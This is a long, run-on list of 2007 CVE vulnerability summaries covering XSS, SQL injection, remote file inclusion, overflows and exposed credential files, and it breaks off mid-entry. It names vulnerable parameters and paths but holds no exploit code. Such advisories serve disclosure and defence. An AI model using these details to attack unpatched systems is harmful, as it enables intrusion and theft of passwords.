Messaging Security for SMB 3.5, Damage Cleanup Services 3.2, and possibly other products, assigns Everyone write permission for the \\.\TmComm DOS device interface, which allows local users to access privileged IOCTLs and execute arbitrary code or overwrite arbitrary memory in the kernel context. [CVE-2007-0854] Remote file inclusion vulnerability in scripts2/objcache in cPanel WebHost Manager (WHM) allows remote attackers to execute arbitrary code via a URL in the obj parameter. NOTE: a third party claims that this issue is not file inclusion because the contents are not parsed, but the attack can be used to overwrite files in /var/cpanel/objcache or provide unexpected web page contents. [CVE-2007-0852] Cross-site scripting (XSS) vulnerability in DevTrack 6.x allows remote attackers to inject arbitrary web script or HTML via the "Keyword search" form field and unspecified other form fields that populate a public saved query. NOTE: the provenance of this information is unknown [CVE-2007-0846] Cross-site scripting (XSS) vulnerability in forum.php in Open Tibia Server CMS (OTSCMS) 2.1.5 and earlier allows remote attackers to inject arbitrary HTML or web script via the name parameter. [CVE-2007-0840] Cross-site scripting (XSS) vulnerability in HLstats before 1.35 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in the search class. NOTE: it is possible that this issue overlaps CVE-2006-4543.3 or CVE-2006-4454. [CVE-2007-0839] Multiple PHP remote file inclusion vulnerabilities in index/index_album.php in Valarsoft WebMatic 2.6 allow remote attackers to execute arbitrary PHP code via a URL in the (1) P_LIB and (2) P_INDEX parameters. [CVE-2007-0834] Cross-site scripting (XSS) vulnerability in FlashChat 4.7.8 allows remote attackers to inject arbitrary web script or HTML via the user name field when the user joins a chat room, a different vulnerability than CVE-2007-0807. NOTE: the provenance of this information is unknown [CVE-2007-0830] * DISPUTED Multiple cross-site scripting (XSS) vulnerabilities in the Admin Control Panel (AdminCP) in Jelsoft vBulletin 3.6.4 allow remote authenticated administrators to inject arbitrary web script or HTML via unspecified vectors related to the (1) User Group Manager, (2) User Rank Manager, (3) User Title Manager, (4) BB Code Manager, (5) Attachment Manager, (6) Calendar Manager, and (7) Forums & Moderators functions. NOTE: the vendor disputes this issue, stating that modifying HTML is an intended privilege of an administrator. NOTE: it is possible that this issue overlaps CVE-2006-6040. [CVE-2007-0817] Cross-site scripting (XSS) vulnerability in Adobe ColdFusion web server allows remote attackers to inject arbitrary HTML or web script via the User-Agent HTTP header, which is not sanitized before being displayed in an error page. [CVE-2007-0815] Cross-site scripting (XSS) vulnerability in images_archive.asp in Uapplication Uphotogallery 1.1 allows remote authenticated administrators to inject arbitrary web script or HTML via the s parameter. NOTE: the thumbnails.asp vector is already covered by CVE-2006-3023. [CVE-2007-0814] Multiple cross-site scripting (XSS) vulnerabilities in Adrenalin's ASP Chat allow remote attackers to inject arbitrary web script or HTML (1) via the psuedo (pseudo) field or (2) during chat. [CVE-2007-0813] Cross-site scripting (XSS) vulnerability in Home production MySearchEngine allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-0807] Cross-site scripting (XSS) vulnerability in info.php in flashChat 4.7.8 allows remote attackers to inject arbitrary web script or HTML via a channel title (aka room name) that is not properly handled by the "who's online" feature. [CVE-2007-0801] The nsExternalAppHandler::SetUpTempFile function in Mozilla Firefox 1.5.0.9 creates temporary files with predictable filenames based on creation time, which allows remote attackers to execute arbitrary web script or HTML via a crafted XMLHttpRequest. [CVE-2007-0798] Multiple cross-site scripting (XSS) vulnerabilities in Ublog Reload 1.0.5 allow remote attackers to inject arbitrary web script or HTML via unspecified parameters to (1) login.asp [CVE-2007-0791] Cross-site scripting (XSS) vulnerability in Atom feeds in Bugzilla 2.20.3, 2.22.1, and 2.23.3, and earlier versions down to 2.20.1, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-0788] Cross-site scripting (XSS) vulnerability in MediaWiki 1.9.x before 1.9.2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "sortable tables JavaScript." [CVE-2007-0779] GUI overlay vulnerability in Mozilla Firefox 1.5.x before 1.5.0.10 and 2.x before 2.0.0.2, and SeaMonkey before 1.0.8 allows remote attackers to spoof certain user interface elements, such as the host name or security indicators, via the CSS3 hotspot property with a large, transparent, custom cursor. [CVE-2007-0774] Stack-based buffer overflow in the map_uri_to_worker function (native/common/jk_uri_worker_map.c) in mod_jk.so for Apache Tomcat JK Web Server Connector 1.2.19 and 1.2.20, as used in Tomcat 4.1.34 and 5.5.20, allows remote attackers to execute arbitrary code via a long URL that triggers the overflow in a URI worker map routine. [CVE-2007-0769] DISPUTED Cross-site scripting (XSS) vulnerability in register.php in Phorum 5.1.18 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: the vendor disputes this vulnerability, stating that "The characters are escaped properly." [CVE-2007-0768] Multiple cross-site scripting (XSS) vulnerabilities in the Contact Details functionality in Yahoo! Messenger 8.1.0.209 and earlier allow user-assisted remote attackers to inject arbitrary web script or HTML via a javascript: URI in the SRC attribute of an IMG element to the (1) First Name, (2) Last Name, and (3) Nickname fields. NOTE: some of these details are obtained from third party information. [CVE-2007-0767] Cross-site scripting (XSS) vulnerability in the core in Phorum before 5.1.18 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-0763] Cross-site scripting (XSS) vulnerability in the news comment functionality in F3Site 2.1 and earlier allows remote attackers to inject arbitrary web script or HTML via the Autor field. [CVE-2007-0747] load_webdav in Apple Mac OS X 10.3.9 through 10.4.9 does not properly clean the environment when mounting a WebDAV filesystem, which allows local users to gain privileges by setting unspecified environment variables. [CVE-2007-0742] The WebFoundation framework in Apple Mac OS X 10.3.9 and earlier allows subdomain cookies to be accessed by the parent domain, which allows remote attackers to obtain sensitive information. [CVE-2007-0735] Use-after-free vulnerability in Libinfo in Apple Mac OS X 10.3.9 through 10.4.9 allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via unspecified vectors involving crafted web pages that trigger certain error conditions that are not properly reported in certain circumstances, resulting in accessing deallocated memory. [CVE-2007-0724] The IOKit HID interface in Apple Mac OS X 10.3.9 and 10.4 through 10.4.8 does not sufficiently limit access to certain controls, which allows local users to gain privileges by using HID device events to read keystrokes from the console. [CVE-2007-0706] Cross-zone scripting vulnerability in Darksky RSS bar for Internet Explorer before 1.29, RSS bar for Sleipnir before 1.29, and RSS bar for unDonut before 1.29 allows remote attackers to bypass Web content zone restrictions via certain script contained in RSS data. NOTE: some of these details are obtained from third party information. [CVE-2007-0705] Cross-zone scripting vulnerability in Sleipnir 2.49 and earlier, and Portable Sleipnir 2.45 and earlier, allows remote attackers to bypass Web content zone restrictions via certain script contained in RSS data. NOTE: some of these details are obtained from third party information. [CVE-2007-0703] PHP remote file inclusion vulnerability in library/StageLoader.php in WebBuilder 2.0 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the GLOBALS[core][module_path] parameter. [CVE-2007-0700] Directory traversal vulnerability in index.php in Guernion Sylvain Portail Web Php (aka Gsylvain35 Portail Web, PwP) allows remote attackers to read arbitrary files via a .. (dot dot) in the page parameter. NOTE: this issue was later reported for 2.5.1.1. [CVE-2007-0699] PHP remote file inclusion vulnerability in includes/includes.php in Guernion Sylvain Portail Web Php (aka Gsylvain35 Portail Web, PwP) before 2.5.1.1 allows remote attackers to execute arbitrary PHP code via a URL in the site_path parameter. [CVE-2007-0696] Cross-site scripting (XSS) vulnerability in error messages in Free LAN In(tra\|ter)net Portal (FLIP) before 1.0-RC3 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters, different vectors than CVE-2007-0611. [CVE-2007-0694] Cross-site scripting (XSS) vulnerability in footer.php in DGNews 2.1 allows remote attackers to inject arbitrary web script or HTML via the copyright parameter. [CVE-2007-0675] A certain ActiveX control in sapi.dll (aka the Speech API) in Speech Components in Microsoft Windows Vista, when the Speech Recognition feature is enabled, allows user-assisted remote attackers to delete arbitrary files, and conduct other unauthorized activities, via a web page with an embedded sound object that contains voice commands to an enabled microphone, allowing for interaction with Windows Explorer. [CVE-2007-0661] Intel Enterprise Southbridge 2 Baseboard Management Controller (BMC), Intel Server Boards 5000XAL, S5000PAL, S5000PSL, S5000XVN, S5000VCL, S5000VSA, SC5400RA, and OEM Firmware for Intel Enterprise Southbridge Baseboard Management Controller before 20070119, when Intelligent Platform Management Interface (IPMI) is enabled, allow remote attackers to connect and issue arbitrary IPMI commands, possibly triggering a denial of service. [CVE-2007-0660] Cross-site scripting (XSS) vulnerability in the IFrame module before 03.02.01 for DotNetNuke (DNN) allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to "Pass through values." [CVE-2007-0651] Multiple cross-site scripting (XSS) vulnerabilities in MailEnable Professional before 2.37 allow remote attackers to inject arbitrary Javascript script via (1) e-mail messages and (2) the ID parameter to (a) right.asp, (b) Forms/MAI/list.asp, and (c) Forms/VCF/list.asp in mewebmail/base/default/lang/EN/. [CVE-2007-0649] Variable overwrite vulnerability in interface/globals.php in OpenEMR 2.8.2 and earlier allows remote attackers to overwrite arbitrary program variables and conduct other unauthorized activities, such as conduct (a) remote file inclusion attacks via the srcdir parameter in custom/import_xml.php or (b) cross-site scripting (XSS) attacks via the rootdir parameter in interface/login/login_frame.php, via vectors associated with extract operations on the (1) POST and (2) GET superglobal arrays. NOTE: this issue was originally disputed before the extract behavior was identified in post-disclosure analysis. Also, the original report identified "Open Conference Systems," but this was an error. [CVE-2007-0629] The www_purgeList method in Plain Black WebGUI before 7.3.8 does not properly check user permissions, which allows attackers to delete unauthorized assets. NOTE: some of these details are obtained from third party information. [CVE-2007-0628] Multiple cross-site scripting (XSS) vulnerabilities in Sun Java System Access Manager 6.1, 6.2, 6 2005Q1 (6.3), and 7 2005Q4 (7.0) before 20070129 allow remote attackers to inject arbitrary web script or HTML via the (1) goto or (2) gx-charset parameter. NOTE: some of these details are obtained from third party information. [CVE-2007-0620] download.php in FD Script 1.3.2 and earlier allows remote attackers to read source of files under the web document root with certain extensions, including .php, via a relative pathname in the fname parameter, as demonstrated by downloading config.php. [CVE-2007-0611] Multiple cross-site scripting (XSS) vulnerabilities in Free LAN In(tra\|ter)net Portal (FLIP) before 1.0-RC2 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors in (1) inc.page.php and (2) inc.text.php. [CVE-2007-0610] Cross-site scripting (XSS) vulnerability in the mailform feature in CMSimple 2.7 fix1 allows remote attackers to inject arbitrary web script or HTML via the sender parameter. NOTE: The provenance of this information is unknown [CVE-2007-0607] W-Agora (Web-Agora) 4.2.1, when register_globals is enabled, stores globals.inc under the web document root with insufficient access control, which allows remote attackers to obtain application path information via a direct request. [CVE-2007-0605] Cross-site scripting (XSS) vulnerability in picture.php in Advanced Guestbook 2.4.2 allows remote attackers to inject arbitrary web script or HTML via the picture parameter. [CVE-2007-0604] Cross-site scripting (XSS) vulnerability in Movable Type (MT) before 3.34 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to the MTCommentPreviewIsStatic tag, which can open the "comment entry screen," a different vulnerability than CVE-2007-0231. [CVE-2007-0595] Cross-site scripting (XSS) vulnerability in search in High 5 Review Site allows remote attackers to inject arbitrary web script or HTML via the q parameter (aka the search box). [CVE-2007-0594] Siteman 2.0.x2 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing password hashes via a direct request for db/siteman/users.MYD. [CVE-2007-0593] Siteman 1.1.11 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing password hashes via a direct request for data/members.txt. [CVE-2007-0592] Cross-site scripting (XSS) vulnerability in EzDatabase 2.1.3 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to admin/login.php and the Admin Panel Database. [CVE-2007-0590] Cross-site scripting (XSS) vulnerability in busca2.asp in Forum Livre 1.0 remote attackers to inject arbitrary web script or HTML via the palavra parameter. [CVE-2007-0585] include/debug.php in Webfwlog 0.92 and earlier, when register_globals is enabled, allows remote attackers to obtain source code of files via the conffile parameter. NOTE: some of these details are obtained from third party information. It is likely that this issue can be exploited to conduct directory traversal attacks. [CVE-2007-0583] Multiple cross-site scripting (XSS) vulnerabilities in HTTP Commander 6.0, and possibly earlier, allow remote attackers to inject arbitrary web script or HTML via the (1) LogoffMessage parameter to logofflast.aspx or the (2) txtUsername parameter to Default.aspx. NOTE: The provenance of this information is unknown [CVE-2007-0579] Unspecified vulnerability in the calendar component in Horde Groupware Webmail Edition before 1.0, and Groupware before 1.0, allows remote attackers to include certain files via unspecified vectors. NOTE: some of these details are obtained from third party information. [CVE-2007-0574] SQL injection vulnerability in rss/show_webfeed.php in SpoonLabs Vivvo Article Management CMS (aka phpWordPress) 3.40 allows remote attackers to execute arbitrary SQL commands via the wcHeadlines parameter, a different vector than CVE-2006-4715. NOTE: The provenance of this information is unknown [CVE-2007-0567] Cross-site scripting (XSS) vulnerability in admin.php in Interactive-Scripts.Com PHP Membership Manager 1.5 allows remote attackers to inject arbitrary web script or HTML via the _p parameter. [CVE-2007-0563] Multiple cross-site scripting (XSS) vulnerabilities in Symantec Web Security (SWS) before 3.0.1.85 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors related to (1) error messages and (2) blocked page messages produced by SWS. [CVE-2007-0553] Multiple cross-site scripting (XSS) vulnerabilities in index.inc.php in PHProxy before 0.5 beta 2 allow remote attackers to inject arbitrary web script or HTML via the (1) data[realm] and (2) _url parameters, different vectors than CVE-2004-2604. NOTE: some of these details are obtained from third party information. [CVE-2007-0552] Cross-site scripting (XSS) vulnerability in install/default/error404.html in Oh no! Not another CMS (Onnac) 0.0.8.4 and earlier allows remote attackers to inject arbitrary web script or HTML via the error_url parameter. [CVE-2007-0550] Cross-site scripting (XSS) vulnerability in search.php in 212cafeBoard 0.08 Beta allows remote attackers to inject arbitrary web script or HTML via keyword parameter. [CVE-2007-0549] Cross-site scripting (XSS) vulnerability in list3.php in 212cafeBoard 6.30 Beta allows remote attackers to inject arbitrary web script or HTML via the user parameter. [CVE-2007-0547] Cross-site scripting (XSS) vulnerability in CGI-RESCUE WebFORM 4.3 and earlier allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-0546] Toxiclab Shoutbox 1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for db.mdb. [CVE-2007-0545] Maxtricity Tagger 0.1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for tagger.mdb. [CVE-2007-0544] Cross-site scripting (XSS) vulnerability in private.php in MyBB (aka MyBulletinBoard) allows remote authenticated users to inject arbitrary web script or HTML via the Subject field, a different vector than CVE-2006-2949. [CVE-2007-0543] ZixForum 1.14 and earlier stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a database containing passwords via a direct request for Zixforum.mdb. NOTE: a followup post suggests that this issue only occurs if the administrator does not properly follow installation directions. [CVE-2007-0542] Cross-site scripting (XSS) vulnerability in show.php in 212cafe Guestbook 4.00 beta allows remote attackers to inject arbitrary web script or HTML via the user parameter. [CVE-2007-0534] Multiple cross-site scripting (XSS) vulnerabilities in the (1) Project issue tracking 4.7.0 through 5.x before 20070123 and (2) Project 4.6.0 through 5.x before 20070123 modules for Drupal allow remote authenticated users to inject arbitrary web script or HTML via (a) certain "fields on project nodes" or (b) "certain project-specific settings regarding issue tracking." [CVE-2007-0533] The AToZed IntraWeb component 8.0 and earlier for Borland Delphi and Kylix, and IntraWeb 9.0 before build (9.0.12), allows remote attackers to cause a denial of service (thread hang or CPU consumption) via a crafted HTTP request, related to the OnBeforeDispatch function in the TIWServerController object. [CVE-2007-0532] Tuan Do Uploader (aka php-uploader) 6 beta 1 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain the administrator password hash via a direct request for userdata/user_1.txt. [CVE-2007-0531] PHP remote file inclusion vulnerability in includes/login.php in FreeWebShop 2.2.3 and 2.2.4 before 20070123 allows remote attackers to execute arbitrary PHP code via a URL in the lang_file parameter. [CVE-2007-0529] Cross-site scripting (XSS) vulnerability in index.html (aka the administration page) in PHP Link Directory (phpLD) 3.0.6 and earlier allows remote attackers to inject arbitrary web script or HTML via a crafted link, which is triggered when the administrator uses the "Validate Links" functionality. [CVE-2007-0528] The admin web console implemented by the Centrality Communications (aka Aredfox) PA168 chipset and firmware 1.54 and earlier, as provided by various IP phones, does not require passwords or authentication tokens when using HTTP, which allows remote attackers to connect to existing superuser sessions and obtain sensitive information (passwords and configuration data). [CVE-2007-0527] SQL injection vulnerability in the is_remembered function in class.login.php in Website Baker 2.6.5 and earlier allows remote attackers to execute arbitrary SQL commands via the REMEMBER_KEY cookie parameter. NOTE: some of these details are obtained from third party information. [CVE-2007-0526] Multiple cross-site scripting (XSS) vulnerabilities in Bitweaver 1.3.1 allow remote attackers to inject arbitrary web script or HTML via the URL (PATH_INFO) to (1) articles/edit.php, (2) articles/list.php, (3) blogs/list_blogs.php, or (4) blogs/rankings.php. [CVE-2007-0525] Multiple buffer overflows in Nickolas Grigoriadis Mini Web server (MiniWebsvr) before 0.05 have unknown impact and attack vectors. [CVE-2007-0519] Cross-site scripting (XSS) vulnerability in memcp.php in XMB U2U Instant Messenger allows remote authenticated users to inject arbitrary web script or HTML via the recipient field. [CVE-2007-0518] Scriptsez Smart PHP Subscriber (aka subscribe) stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain encoded passwords via a direct request for pwd.txt. [CVE-2007-0517] Scriptsez Random PHP Quote 1.0 stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain password information via a direct request for pwd.txt. [CVE-2007-0514] Multiple cross-site scripting (XSS) vulnerabilities in multiple Hitachi Web Server, uCosminexus, and Cosminexus products before 20070124 allow remote attackers to inject arbitrary web script or HTML via (1) HTTP Expect headers or (2) image maps. [CVE-2007-0502] SQL injection vulnerability in gallery.php in webSPELL 4.01.02 allows remote attackers to execute arbitrary SQL commands via the picID parameter, a different vector than CVE-2007-0492. [CVE-2007-0496] PHP remote file inclusion vulnerability in lib/nl/nl.php in Neon Labs Website (nlws) 3.2 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the g_strRootDir parameter. [CVE-2007-0492] Multiple SQL injection vulnerabilities in gallery.php in webSPELL 4.01.02 and earlier allow remote attackers to execute arbitrary SQL commands via the (1) id or (2) galleryID parameter. NOTE: The provenance of this information is unknown [CVE-2007-0485] PHP remote file inclusion vulnerability in defines.php in WebChat 0.77 allows remote attackers to execute arbitrary PHP code via a URL in the WEBCHATPATH parameter. [CVE-2007-0483] Multiple cross-site scripting (XSS) vulnerabilities in Enthusiast 3.1 allow remote attackers to inject arbitrary web script or HTML via the URI for (1) show_owned.php or (2) show_joined.php. NOTE: The provenance of this information is unknown [CVE-2007-0482] cgi-bin/main in Sun Ray Server Software 2.0 and 3.0 before 20070123 allows local users to obtain the utadmin password by reading a web server's log file, or by conducting a different, unspecified local attack. [CVE-2007-0478] WebCore on Apple Mac OS X 10.3.9 and 10.4.10, as used in Safari, does not properly parse HTML comments in TITLE elements, which allows remote attackers to conduct cross-site scripting (XSS) attacks and bypass some XSS protection schemes by embedding certain HTML tags within an HTML comment. [CVE-2007-0477] Cross-site scripting (XSS) vulnerability in Openads 2.0.x before 2.0.10, 2.3 before 2.3.31 (aka Max Media Manager before 0.3.31-alpha-pr2), and phpAdsNew/phpPgAds before 2.0.9-pr1 allows remote attackers to inject arbitrary web script or HTML via (1) the keyword parameter in admin-search.php and (2) affiliate-search.php. NOTE: this issue may overlap CVE-2007-0363. [CVE-2007-0437] Multiple cross-site scripting (XSS) vulnerabilities in the sample Cache' Server Page (CSP) scripts in InterSystems Cache' allow remote attackers to inject arbitrary web script or HTML via (1) the TO parameter to loop.csp, (2) the VALUE parameter to cookie.csp, and (3) the PAGE parameter to showsource.csp in csp/samples/ [CVE-2007-0429] DivXBrowserPlugin (aka DivX Web Player) npdivx32.dll, as distributed with DivX Player 6.4.1, allows remote attackers to cause a denial of service (Internet Explorer 7 crash) by invoking the GoWindowed method for a certain instance of the ActiveX object. [CVE-2007-0426] BEA WebLogic Portal 9.2, when running in a WebLogic Server clustered environment using WebLogic Portal entitlements, does not properly propagate entitlement policy changes if the changes are made on a managed server while the Administrative Server is unavailable, which might allow attackers to bypass intended restrictions. [CVE-2007-0425] Unspecified vulnerability in BEA WebLogic Platform and Server 8.1 through 8.1 SP5, and JRockit 1.4.2 R4.5 and earlier, allows attackers to gain privileges via unspecified vectors, related to an "overflow condition," probably a buffer overflow. [CVE-2007-0424] Unspecified vulnerability in the BEA WebLogic Server proxy plug-in for Netscape Enterprise Server before September 2006 for Netscape Enterprise Server allow remote attackers to cause a denial of service via certain requests that trigger errors that lead to a server being marked as unavailable, hosting web server failure, or CPU consumption. [CVE-2007-0423] BEA WebLogic Portal 9.2 does not properly handle when an administrator deletes entitlements for a role, which causes other role entitlements to be "inadvertently affected," which has an unknown impact. [CVE-2007-0422] BEA WebLogic Server 9.0, 9.1, and 9.2 Gold, when running on Solaris 9, allows remote attackers to cause a denial of service (server inaccessibility) via manipulated socket connections. [CVE-2007-0421] BEA WebLogic Server 6.1 through 6.1 SP7, and 7.0 through 7.0 SP7 allows remote attackers to cause a denial of service (disk consumption) via requests containing malformed headers, which cause a large amount of data to be written to the server log. [CVE-2007-0420] BEA WebLogic Server 9.0, 9.1, and 9.2 Gold allows remote attackers to obtain sensitive information via malformed HTTP requests, which reveal data from previous requests. [CVE-2007-0419] The BEA WebLogic Server proxy plug-in before June 2006 for the Apache HTTP Server does not properly handle protocol errors, which allows remote attackers to cause a denial of service (server outage). [CVE-2007-0418] BEA WebLogic Server 7.0 through 7.0 SP6, 8.1 through 8.1 SP5, 9.0, and 9.1 does not enforce a security policy that declares permissions for EJB methods that have array parameters, which allows remote attackers to obtain unauthorized access to these methods. [CVE-2007-0417] BEA WebLogic Server 7.0 through 7.0 SP7, 8.1 through 8.1 SP5, 9.0, and 9.1, when using the WebLogic Server 6.1 compatibility realm, allows attackers to execute certain EJB container persistence operations with an administrative identity. [CVE-2007-0416] The WSEE runtime (WS-Security runtime) in BEA WebLogic Server 9.0 and 9.1 does not verify credentials when decrypting client messages, which allows remote attackers to bypass application security. [CVE-2007-0415] BEA WebLogic Server 8.1 through 8.1 SP5 does not properly enforce access control after a dynamic update and dynamic redeployment of an application that is implemented through exploded jars, which allows attackers to bypass intended access restrictions. [CVE-2007-0414] BEA WebLogic Server 6.1 through 6.1 SP7, 7.0 through 7.0 SP6, 8.1 through 8.1 SP5, and 9.0 allows remote attackers to cause a denial of service (server hang) via certain requests that cause muxer threads to block when processing error pages. [CVE-2007-0413] BEA WebLogic Server 8.1 through 8.1 SP5 stores cleartext data in a backup of config.xml after offline editing, which allows local users to obtain sensitive information by reading this backup file. [CVE-2007-0412] BEA WebLogic Server 6.1 through 6.1 SP7, 7.0 through 7.0 SP7, and 8.1 through 8.1 SP5 allows remote attackers to read arbitrary files inside the class-path property via .ear or exploded .ear files that use the manifest class-path property to point to utility jar files. [CVE-2007-0411] BEA WebLogic Server 8.1 through 8.1 SP5, 9.0, 9.1, and 9.2 Gold, when WS-Security is used, does not properly validate certificates, which allows remote attackers to conduct a man-in-the-middle (MITM) attack. [CVE-2007-0410] Unspecified vulnerability in the thread management in BEA WebLogic 7.0 through 7.0 SP6, 8.1 through 8.1 SP5, 9.0, and 9.1, when T3 authentication is used, allows remote attackers to cause a denial of service (thread and system hang) via unspecified "sequences of events." [CVE-2007-0409] BEA WebLogic 7.0 through 7.0 SP6, 8.1 through 8.1 SP4, and 9.0 initial release does not encrypt passwords stored in the JDBCDataSourceFactory MBean Properties, which allows local administrative users to read the cleartext password. [CVE-2007-0408] BEA Weblogic Server 8.1 through 8.1 SP4 does not properly validate client certificates when reusing cached connections, which allows remote attackers to obtain access via an untrusted X.509 certificate. [CVE-2007-0407] Cross-site scripting (XSS) vulnerability in Operation/User.pm in Plain Black WebGUI before 7.3.5 (beta) allows remote attackers to inject arbitrary web script or HTML via the username parameter during anonymous registration, a different vector than CVE-2007-0308. NOTE: it is possible that a separate "WikiPage titles" issue was also fixed. [CVE-2007-0402] Cross-site scripting (XSS) vulnerability in admin/edit_member.php in Easebay Resources Paypal Subscription Manager allows remote attackers to inject arbitrary web script or HTML via the username parameter. [CVE-2007-0400] Cross-site scripting (XSS) vulnerability in admin/memberlist.php in Easebay Resources Login Manager 3.0 allows remote attackers to inject arbitrary web script or HTML via the keyword parameter. [CVE-2007-0399] Multiple cross-site scripting (XSS) vulnerabilities in index.php in Simple Machines Forum (SMF) 1.1 RC3 allow remote authenticated users to inject arbitrary web script or HTML via the (1) recipient or (2) BCC field when selecting send in a pm action. [CVE-2007-0398] Multiple cross-site scripting (XSS) vulnerabilities in forum.php3 in Arnaud Guyonne (aka Arnotic) a-forum allow remote attackers to inject arbitrary web script or HTML via the (1) Sujet or (2) Pseudo field. [CVE-2007-0390] Cross-site scripting (XSS) vulnerability in index.php in sabros.us 1.7 allows remote attackers to inject arbitrary web script or HTML via the tag parameter. [CVE-2007-0387] SQL injection vulnerability in models/category.php in the Weblinks component for Joomla! SVN 20070118 (com_weblinks) allows remote attackers to execute arbitrary SQL commands via the catid parameter. [CVE-2007-0384] Cross-site scripting (XSS) vulnerability in preview in the reviews section in PostNuke 0.764 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-0379] Cross-site scripting (XSS) vulnerability in DocMan 1.3 RC2 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-0377] Multiple SQL injection vulnerabilities in Xoops 2.0.16 allow remote attackers to execute arbitrary SQL commands via (1) the id parameter in kernel/group.php in core, (2) the lid parameter in class/table_broken.php in the Weblinks module, and other unspecified vectors. [CVE-2007-0376] Cross-site scripting (XSS) vulnerability in Virtuemart 1.0.7 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors. [CVE-2007-0365] Multiple cross-site scripting (XSS) vulnerabilities in All In One Control Panel (AIOCP) 1.3.009 and earlier allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. NOTE: this is probably a different vulnerability than CVE-2006-5830. [CVE-2007-0364] Multiple cross-site scripting (XSS) vulnerabilities in nicecoder.com INDEXU 5.3 and earlier allow remote attackers to inject arbitrary web script or HTML via the (1) error_msg parameter to (a) suggest_category.php [CVE-2007-0363] Cross-site scripting (XSS) vulnerability in admin-search.php in (1) Openads for PostgreSQL (aka phpPgAds) before 2.0.10 and (2) Openads (aka phpAdsNew) before 2.0.10 allows remote attackers to inject arbitrary web script or HTML via unspecified parameters. [CVE-2007-0362] Cross-site scripting (XSS) vulnerability in the RSS feed component in FreshReader before 1.0.07010600 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors, possibly related to tag attributes. [CVE-2007-0357] Directory traversal vulnerability in the AVM IGD CTRL Service in Fritz!DSL 02.02.29 allows remote attackers to read arbitrary files via ..%5C (URL-encoded dot dot backslash) sequences in a URI requested from the AR7 webserver. [CVE-2007-0353] Cross-site scripting (XSS) vulnerability in (1) index.php and (2) login.php in myBloggie 2.1.5 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO string. [CVE-2007-0342] WebCore in Apple WebKit build 18794 allows remote attackers to cause a denial of service (null dereference and application crash) via a TD element with a large number in the ROWSPAN attribute, as demonstrated by a crash of OmniWeb 5.5.3 on Mac OS X 10.4.8, a different vulnerability than CVE-2006-2019. [CVE-2007-0341] Cross-site scripting (XSS) vulnerability in phpMyAdmin 2.8.1 and earlier, when Microsoft Internet Explorer 6 is used, allows remote attackers to inject arbitrary web script or HTML via a javascript: URI in a CSS style in the convcharset parameter to the top-level URI, a different vulnerability than CVE-2005-0992. [CVE-2007-0331] Cross-site scripting (XSS) vulnerability in liens.php3 in liens_dynamiques 2.1 allows remote attackers to inject arbitrary web script or HTML by using the ajouter=1 query string and the add menu. [CVE-2007-0325] Multiple buffer overflows in the Trend Micro OfficeScan Web-Deployment SetupINICtrl ActiveX control in OfficeScanSetupINI.dll, as used in OfficeScan 7.0 before Build 1344, OfficeScan 7.3 before Build 1241, and Client / Server / Messaging Security 3.0 before Build 1197, allow remote attackers to execute arbitrary code via a crafted HTML document. [CVE-2007-0321] Buffer overflow in the Update Service Agent ActiveX Control in isusweb.dll for Macrovision FLEXnet Connect (formerly InstallShield Update Service) allows remote attackers to execute arbitrary code via the Download method. [CVE-2007-0320] Multiple buffer overflows in (a) an ActiveX control (iftw.dll) and (b) Netscape plug-in (npiftw32.dll) for Macrovision (formerly InstallShield) InstallFromTheWeb allow remote attackers to execute arbitrary code via crafted HTML documents. [CVE-2007-0312] wcSimple Poll stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain password hashes via a direct request for password.txt. [CVE-2007-0308] Cross-site scripting (XSS) vulnerability in Plain Black WebGUI before 7.3.4 (beta) allows remote attackers to inject arbitrary web script or HTML via Wiki Page titles. [CVE-2007-0305] SQL injection vulnerability in etkinlikbak.asp in Okul Web Otomasyon Sistemi 4.0.1 allows remote attackers to execute arbitrary SQL commands via the id parameter. [CVE-2007-0302] Multiple cross-site scripting (XSS) vulnerabilities in InstantASP 4.1.0 allow remote attackers to inject arbitrary web script or HTML via the (1) SessionID parameter to (a) Logon.aspx, and the (2) Username and (3) Update parameters to (b) Members1.aspx. [CVE-2007-0301] PHP remote file inclusion vulnerability in _admin/admin_menu.php in FdWeB Espace Membre 2.1 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the path parameter. [CVE-2007-0290] Multiple unspecified vulnerabilities in Oracle E-Business Suite and Applications 11.5.10CU2 have unknown impact and attack vectors related to (1) Application Object Library (APPS01), (2) Human Resources (APPS03), (3) Payables (APPS04), (4) Trading Community Architecture (APPS05), and (5) Web Applications Desktop Integrator (APPS06). [CVE-2007-0275] Cross-site scripting (XSS) vulnerability in Oracle Reports Web Cartridge (RWCGI60) in the Workflow Cartridge component, as used in Oracle Database 9.2.0.8, 10.1.0.5, and 10.2.0.3 [CVE-2007-0266] SQL injection vulnerability in boxx/ShowAppendix.asp in Ezboxx Portal System Beta 0.7.6 and earlier allows remote attackers 